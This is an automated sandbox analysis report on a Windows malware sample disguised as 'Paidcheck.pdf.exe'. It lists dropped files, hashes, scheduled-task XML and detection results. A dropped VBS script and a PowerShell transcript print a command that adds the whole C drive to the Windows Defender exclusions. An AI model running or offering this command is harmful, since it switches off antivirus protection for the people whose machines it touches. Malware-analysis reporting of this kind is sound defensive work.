                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...xX.Z..............0.............^.... ........@.. ....................... ............`.....................................O.......8...............h>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Paidcheck.pdf.exe.log
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):1119
                                                                          Entropy (8bit):5.356708753875314
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                                          MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                                          SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                                          SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                                          SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                                          Malicious:true
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):42
                                                                          Entropy (8bit):4.0050635535766075
                                                                          Encrypted:false
                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                          Malicious:true
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
                                                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):42
                                                                          Entropy (8bit):4.0050635535766075
                                                                          Encrypted:false
                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                          Malicious:false
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):14734
                                                                          Entropy (8bit):4.993014478972177
                                                                          Encrypted:false
                                                                          SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                          MD5:8D5E194411E038C060288366D6766D3D
                                                                          SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                          SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                          SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                          Malicious:false
                                                                          Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):22180
                                                                          Entropy (8bit):5.6036359814823635
                                                                          Encrypted:false
                                                                          SSDEEP:384:2tCD+0oF8RO6c9Q2M4KnQwICu7V9wmSJUeRe1BMkmZZkV7ENWDOD4I5iOYs:/O6QE4KQw9VmXeNDW42S
                                                                          MD5:479FD065539F6CB9A9073194EE43BA62
                                                                          SHA1:A42CBC7BA81ABA1675795855760D409D15B519A0
                                                                          SHA-256:CD0AC9E26FBF8ED83477179601F435FF3AB5C7E265A3267F2BD55F9A564558D6
                                                                          SHA-512:873047CDCAD971FB4AE20D00592B561E6DB24022BE65F761260354608C0EE772E931EF56CEF7F6D122690DD68E8364D9E147A386B330A9C461D0F9AE72607581
                                                                          Malicious:false
                                                                          Preview: @...e...........a...........7.).......h.8............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                          C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):64616
                                                                          Entropy (8bit):6.037264560032456
                                                                          Encrypted:false
                                                                          SSDEEP:768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
                                                                          MD5:6FD7592411112729BF6B1F2F6C34899F
                                                                          SHA1:5E5C839726D6A43C478AB0B95DBF52136679F5EA
                                                                          SHA-256:FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
                                                                          SHA-512:21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                           • Antivirus: Virustotal, Detection: 0%
                                                                           • Antivirus: Metadefender, Detection: 0%
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...xX.Z..............0.............^.... ........@.. ....................... ............`.....................................O.......8...............h>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                                          C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):182
                                                                          Entropy (8bit):4.995421543347364
                                                                          Encrypted:false
                                                                          SSDEEP:3:FER/n0eFHgSSJJF2uV1HeGAFddGeWLCXknRAuWXp5cViEaKC5SufyM1K/RFofD6T:FER/lFHsCu/eGgdEYmRAuWXp+NaZ5Su4
                                                                          MD5:8F1279E3972239624A9E5037A4261E8A
                                                                          SHA1:D45F5CD9A81863BF6B486F77FCB0A1497DD46446
                                                                          SHA-256:C07EF3D32222554903427589627F33C222F6D507D1F161A5FCD11EBF29BFA6CC
                                                                          SHA-512:F0380E6ED1B58EE2A9B83D662E0486AF7352B5B72F72375B72F69E567297F3DC08AD372045E58DD81BC62DE32C9DB22F7A670D208F80B2BEC83B941FF790EDE8
                                                                          Malicious:true
                                                                          Preview: CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'", 0, False
                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qglplkd.nbo.ps1
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview: 1
                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ai3xzej.ihr.psm1
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview: 1
                                                                          C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1307
                                                                          Entropy (8bit):5.1055546710401485
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0aa5xtn:cbk4oL600QydbQxIYODOLedq3Ba5j
                                                                          MD5:E1762CDA6D6A3715B829E81B77FF06F7
                                                                          SHA1:B9F6318A5E4CDB1462E45A0B08EE46D303C40715
                                                                          SHA-256:48A86564D25864484ABE34BAA5B71890B8AF30ADE8AC1CF14BBACAE28036F09F
                                                                          SHA-512:DC6218645DBE168DCB8DE01124694FF26ED033E7A5CE066FAA1D00817F2E51D167938B4FF4231F514F60895EF0FFE95880D401358C69E49126A219CBF7D3E705
                                                                          Malicious:true
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                          C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1310
                                                                          Entropy (8bit):5.109425792877704
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                                                          MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                                                          SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                                                          SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                                                          SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                                                          Malicious:false
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):232
                                                                          Entropy (8bit):7.024371743172393
                                                                          Encrypted:false
                                                                          SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                                                                          MD5:32D0AAE13696FF7F8AF33B2D22451028
                                                                          SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                                                                          SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                                                                          SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                                                                          Malicious:false
                                                                          Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):8
                                                                          Entropy (8bit):3.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:Wn:Wn
                                                                          MD5:31760B024C72A6DB96428A87598EDAD6
                                                                          SHA1:26D9DC8EE0FEF7C95EDF8865F54A2477F5B2830D
                                                                          SHA-256:A41605947ADFFD965CFD275409AFE1E71BD692055EB86F3E60F3090D35389FA8
                                                                          SHA-512:2A9C2BB93EF3B50FDA97CACF51FF2228FFADDB33BEFD9062370D240141BE2D6121EFE244F7642926E51487D47BBC504C9B24CCDF9BB81C867974C07A4AFFC343
                                                                          Malicious:true
                                                                          Preview: pf.y.M.H
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bak
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):24
                                                                          Entropy (8bit):4.501629167387823
                                                                          Encrypted:false
                                                                          SSDEEP:3:9bzY6oRDIvYk:RzWDI3
                                                                          MD5:ACD3FB4310417DC77FE06F15B0E353E6
                                                                          SHA1:80E7002E655EB5765FDEB21114295CB96AD9D5EB
                                                                          SHA-256:DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
                                                                          SHA-512:DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
                                                                          Malicious:false
                                                                          Preview: 9iH...}Z.4..f..J".C;"a
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):5.320159765557392
                                                                          Encrypted:false
                                                                          SSDEEP:3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
                                                                          MD5:BB0F9B9992809E733EFFF8B0E562CFD6
                                                                          SHA1:F0BAB3CF73A04F5A689E6AFC764FEE9276992742
                                                                          SHA-256:C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
                                                                          SHA-512:AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
                                                                          Malicious:false
                                                                          Preview: 9iH...}Z.4..f..J".C;"a9iH...}Z.4..f.~a........~.~.......3.U.
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):327432
                                                                          Entropy (8bit):7.99938831605763
                                                                          Encrypted:true
                                                                          SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                                                          MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                                                          SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                                                          SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                                                          SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):44
                                                                          Entropy (8bit):4.308768198567054
                                                                          Encrypted:false
                                                                          SSDEEP:3:oNWXp5cViE2J5xAI0L4A:oNWXp+N23f0L4A
                                                                          MD5:C9298EEE68389B937EFD1A5CE3DB10A2
                                                                          SHA1:2D299BA869C5386FB114AA6016DCB0607DFE98E0
                                                                          SHA-256:270C3AC669C532CE18737BFD72CB2981B65A6F08FF2B7EB5C9A4D8834AEB4E62
                                                                          SHA-512:1EF5C4AC44E1658DC8EA56F98B2714297D39937B9817E4F843D067F59D2778EC3D65E34DD467442F8B7D86248813E834D47A71D79EC3CE2D8E54B8A41BF19FDE
                                                                          Malicious:false
                                                                          Preview: C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):580096
                                                                          Entropy (8bit):6.242459409423084
                                                                          Encrypted:false
                                                                          SSDEEP:12288:UyVRMbXAPtBXomNFYmujpihOcn92JRVkxdGOcA1WJIq:UyVRxPtB3Cjpihvn+VkxIE1c
                                                                          MD5:CE32E8605ADB6C9BB2DCEE69FE887B46
                                                                          SHA1:2ACE1FB1E3523768003B61A4A79193214FFAFED9
                                                                          SHA-256:7E22F7F21E8798805234BE7AC26BAD65C1EDECB55B051343E0933A68041CE073
                                                                          SHA-512:674AD1360E6ED0E1C77865858C08950D6955F8A56544343E9414320470D80258E4FAD0D67EE64423CBC792BFBF2CD6FEE2C1806A837B61F62B7F71C10FE2D9FC
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 33%
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe:Zone.Identifier
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview: [ZoneTransfer]....ZoneId=0
                                                                          C:\Users\user\Documents\20210722\PowerShell_transcript.302494.fAvH+AQY.20210722093349.txt
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):5978
                                                                          Entropy (8bit):5.384226125292334
                                                                          Encrypted:false
                                                                          SSDEEP:96:BZ1hAZN4fqDo1ZUFZGhAZN4fqDo1ZE28srZahAZN4fqDo1ZYDiivZg:8
                                                                          MD5:AB8875BD5B3058B8423A6B26F392B5E7
                                                                          SHA1:9E45AFB3F5211658D59AC397698D841617DC7CF0
                                                                          SHA-256:49EDD3825A4186C0CB39926746C6392AF5D1D3905346C6D212A4E877AFFDC259
                                                                          SHA-512:B27C3C71B2C91FEDE5726FC99027E827847DB7F632999B9C42046023799DCBFF55311457E13F1AEFA8F92F0AC99D521FB2BE579FB5E35AF6C2C807651ED6B283
                                                                          Malicious:false
                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210722093401..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'..Process ID: 748..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210722093401..**********************..PS>Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'..**********************..Windows PowerShell transcript start
                                                                          \Device\ConDrv
                                                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1049
                                                                          Entropy (8bit):4.2989523990568035
                                                                          Encrypted:false
                                                                          SSDEEP:24:z3U3g4DO/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zEw4DBXZxo4ABV+SrUYE
                                                                          MD5:970EE6AEAB63008333D1D883327DA660
                                                                          SHA1:A71E19F66886B1888A183BA1777A23FABAE9822E
                                                                          SHA-256:D270D397EB3CF1173D25795834B240466EFEE213E11B1B31CDC101015AFFCAD9
                                                                          SHA-512:EB49AEE1B4524E6F15C08345A380D7D28DC845DEBA5408A7D034F2F7F5A652C8A2E2FF293BFB307DE87DCC2FAA111BA3BE8BEF9C4752A73DE1835DCD844D39BB
                                                                          Malicious:false
                                                                          Preview: Microsoft .NET Framework Assembly Registration Utility version 4.7.3056.0..for Microsoft .NET Framework version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information..

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):6.242459409423084
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          File name:Paidcheck.pdf.exe
                                                                          File size:580096
                                                                          MD5:ce32e8605adb6c9bb2dcee69fe887b46
                                                                          SHA1:2ace1fb1e3523768003b61a4a79193214ffafed9
                                                                          SHA256:7e22f7f21e8798805234be7ac26bad65c1edecb55b051343e0933a68041ce073
